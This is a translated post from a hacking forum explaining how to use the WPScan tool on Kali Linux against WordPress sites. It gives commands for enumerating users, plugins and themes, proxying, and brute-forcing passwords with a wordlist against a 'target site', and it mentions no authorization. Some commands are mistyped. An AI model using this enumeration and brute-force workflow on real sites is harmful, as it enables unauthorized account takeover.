How can I research vulnerabilities with Kali Linux?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Kullanıcı1233

Kıdemli Üye
19 Tem 2011
Hello guys today i will be telling you finding vulnerabilities on the Wordpress sities with WpScan(Open Source) tool. There will be WpScan on the Kali Linux already. You don't have to make installation for this.

qG7j5D.gif

qG7j5D.gif

-Usage of the WpScan-

For the see our parameters:

Code:
wpscan

For the list of theme:

Code:
wpscan -url örneksite.com -enumerate -t

For the list of pulugins:

Code:
wpscan -url mrneksite.com enumerate -p

For the make an BruteForce attack:

Code:
wpscan -url örneksite.com -wordlist şifreler.txt

For use proxy:

Code:
wpscan -url örneksite.com -proxy ip:port

For accessing the already registered users informations:

Code:
wpscan -url örneksite.com -enumerate u

For the find Timthumb vulnerabilities:

Code:
wpscan -url örneksite.com -enumerate tt

For the make an general scan:

Code:
wpscan -url örneksite.com

qG7j5D.gif

İ told you technic codes before this point. After that lets make a list of the steps.

Firstly with -u parameter we will be acces our user informations.

We have user informations and we will do BruteForce attack after that.

Code:
wpscan-url hedefsite.com -wordlist şifreler.txt -username -(BulduğumuzKullanıcıAdı)

Yes guys my topic is ending this point. Thank you for reading.

IlUd7K.png

-----------------------------------------------------------

Source: https://www.turkhackteam.org/linux/1711910-wpscan-ile-acik-tarama-stajyerasistankulubu.html

Translator: Xowly

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.